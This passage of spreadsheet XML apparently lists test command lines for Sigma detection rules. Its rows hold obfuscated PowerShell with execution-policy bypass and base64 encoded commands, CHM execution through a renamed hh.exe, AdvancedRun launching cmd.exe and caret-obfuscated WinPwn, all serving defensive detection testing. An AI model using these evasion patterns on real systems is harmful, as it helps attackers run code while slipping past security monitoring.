        </is>
      </c>
      <c r="C320" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D320" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E320" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -EncodedCommand V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F320" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G320" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H320" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I320" s="43" t="n"/>
      <c r="J320" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K320" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="321" ht="15.75" customHeight="1" s="42">
      <c r="A321" s="43" t="n"/>
      <c r="B321" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C321" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D321" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E321" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -encODedcommAnd V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F321" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G321" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H321" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I321" s="43" t="n"/>
      <c r="J321" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K321" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="322" ht="15.75" customHeight="1" s="42">
      <c r="A322" s="43" t="n"/>
      <c r="B322" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C322" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D322" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E322" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F322" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G322" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H322" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I322" s="43" t="n"/>
      <c r="J322" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K322" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="323" ht="15.75" customHeight="1" s="42">
      <c r="A323" s="43" t="n"/>
      <c r="B323" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C323" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D323" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E323" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExEcuTiOnPOLiCY Bypass /"EncodedCommand" V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F323" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G323" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H323" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I323" s="43" t="n"/>
      <c r="J323" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K323" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="324" ht="15.75" customHeight="1" s="42">
      <c r="A324" s="43" t="n"/>
      <c r="B324" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C324" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D324" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E324" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EXeCutiONPolICY Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F324" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G324" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H324" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I324" s="36" t="n"/>
      <c r="J324" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K324" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="325" ht="15.75" customHeight="1" s="42">
      <c r="A325" s="43" t="n"/>
      <c r="B325" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C325" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D325" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E325" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -EncodeDcomMAND V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F325" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G325" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H325" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I325" s="36" t="n"/>
      <c r="J325" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K325" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="326" ht="15.75" customHeight="1" s="42">
      <c r="A326" s="43" t="n"/>
      <c r="B326" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C326" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D326" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E326" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -exEcuTIonpoLIcy Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F326" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G326" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H326" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I326" s="43" t="n"/>
      <c r="J326" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K326" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="327" ht="15.75" customHeight="1" s="42">
      <c r="A327" s="43" t="n"/>
      <c r="B327" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C327" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D327" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E327" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F327" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G327" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H327" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I327" s="43" t="n"/>
      <c r="J327" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K327" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="328" ht="15.75" customHeight="1" s="42">
      <c r="A328" s="43" t="n"/>
      <c r="B328" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C328" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D328" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E328" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F328" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G328" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H328" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I328" s="43" t="n"/>
      <c r="J328" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K328" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="329" ht="15.75" customHeight="1" s="42">
      <c r="A329" s="43" t="n"/>
      <c r="B329" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C329" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D329" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E329" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F329" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G329" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H329" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I329" s="43" t="n"/>
      <c r="J329" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K329" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="330" ht="15.75" customHeight="1" s="42">
      <c r="A330" s="43" t="n"/>
      <c r="B330" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C330" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D330" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E330" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F330" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G330" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H330" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I330" s="43" t="n"/>
      <c r="J330" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K330" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="331" ht="15.75" customHeight="1" s="42">
      <c r="A331" s="43" t="n"/>
      <c r="B331" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C331" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D331" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E331" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F331" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G331" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H331" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I331" s="43" t="n"/>
      <c r="J331" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K331" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="332" ht="15.75" customHeight="1" s="42">
      <c r="A332" s="43" t="n"/>
      <c r="B332" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C332" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D332" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E332" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F332" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G332" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H332" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I332" s="43" t="n"/>
      <c r="J332" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K332" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="333" ht="15.75" customHeight="1" s="42">
      <c r="A333" s="43" t="n"/>
      <c r="B333" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C333" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D333" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E333" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F333" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G333" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H333" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I333" s="36" t="n"/>
      <c r="J333" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K333" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="334" ht="15.75" customHeight="1" s="42">
      <c r="A334" s="43" t="n"/>
      <c r="B334" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C334" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D334" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E334" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F334" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G334" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H334" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I334" s="36" t="n"/>
      <c r="J334" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K334" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="335" ht="15.75" customHeight="1" s="42">
      <c r="A335" s="36" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B335" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C335" s="36" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D335" s="36" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E335" s="36" t="inlineStr">
        <is>
          <t>AdvancedRun.exe  /EXEFilename "cmd.exe"  /Run</t>
        </is>
      </c>
      <c r="F335" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G335" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H335" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I335" s="43" t="n"/>
      <c r="J335" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K335" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="336" ht="15.75" customHeight="1" s="42">
      <c r="A336" s="36" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B336" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C336" s="36" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D336" s="36" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E336" s="36" t="inlineStr">
        <is>
          <t>AdvancedRun.exe "/EXEFilename" cmd.exe "/Run"</t>
        </is>
      </c>
      <c r="F336" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G336" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H336" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I336" s="36" t="n"/>
      <c r="J336" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K336" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="337" ht="15.75" customHeight="1" s="42">
      <c r="A337" s="36" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B337" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C337" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D337" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E337" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F337" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G337" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H337" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I337" s="36" t="n"/>
      <c r="J337" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K337" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="338" ht="15.75" customHeight="1" s="42">
      <c r="A338" s="43" t="n"/>
      <c r="B338" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C338" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D338" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E338" s="36" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /node:localhost process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F338" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G338" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H338" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I338" s="36" t="n"/>
      <c r="J338" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K338" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="339" ht="15.75" customHeight="1" s="42">
      <c r="A339" s="43" t="n"/>
      <c r="B339" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C339" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D339" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E339" s="36" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /"node:localhost" process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F339" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G339" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H339" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I339" s="36" t="n"/>
      <c r="J339" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K339" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="340" ht="15.75" customHeight="1" s="42">
      <c r="A340" s="43" t="n"/>
      <c r="B340" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C340" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D340" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E340" s="36" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /nOdE:lOcalHoST process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F340" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G340" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H340" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I340" s="36" t="n"/>
      <c r="J340" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K340" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="341" ht="15.75" customHeight="1" s="42">
      <c r="A341" s="36" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B341" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C341" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D341" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E341" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F341" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G341" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H341" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I341" s="36" t="n"/>
      <c r="J341" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K341" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="342" ht="15.75" customHeight="1" s="42">
      <c r="A342" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B342" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C342" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D342" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E342" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F342" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G342" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H342" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I342" s="36" t="n"/>
      <c r="J342" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K342" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="343" ht="15.75" customHeight="1" s="42">
      <c r="A343" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B343" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C343" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D343" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E343" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F343" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G343" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H343" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I343" s="36" t="n"/>
      <c r="J343" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K343" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="344" ht="15.75" customHeight="1" s="42">
      <c r="A344" s="43" t="n"/>
      <c r="B344" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C344" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D344" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E344" s="36" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /"node:localhost" process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F344" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G344" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H344" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I344" s="36" t="n"/>
      <c r="J344" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K344" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="345" ht="15.75" customHeight="1" s="42">
      <c r="A345" s="43" t="n"/>
      <c r="B345" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C345" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D345" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E345" s="36" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /noDe:LOCALhosT process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F345" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G345" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H345" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I345" s="36" t="n"/>
      <c r="J345" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K345" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="346" ht="15.75" customHeight="1" s="42">
      <c r="A346" s="43" t="n"/>
      <c r="B346" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C346" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D346" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E346" s="36" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /nOdE:lOcalHoST process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F346" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G346" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H346" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I346" s="36" t="n"/>
      <c r="J346" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K346" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="347" ht="15.75" customHeight="1" s="42">
      <c r="A347" s="36" t="n"/>
      <c r="B347" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_ping_copy_combined_execution</t>
        </is>
      </c>
      <c r="C347" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Ping/Copy Command Combination</t>
        </is>
      </c>
      <c r="D347" s="36" t="inlineStr">
        <is>
          <t>ded2b07a-d12f-4284-9b76-653e37b6c8b0</t>
        </is>
      </c>
      <c r="E347" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C "ping -n 1 127.0.0.1 &amp;&amp; copy C:\Windows\System32\drivers\etc\hosts C:\Temp\hosts.bak"</t>
        </is>
      </c>
      <c r="F347" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G347" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H347" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I347" s="36" t="n"/>
      <c r="J347" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K347" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="348" ht="15.75" customHeight="1" s="42">
      <c r="A348" s="36" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B348" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C348" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D348" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E348" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F348" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G348" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H348" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I348" s="36" t="n"/>
      <c r="J348" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K348" s="36" t="b">
        <v>0</v>
      </c>
    </row>
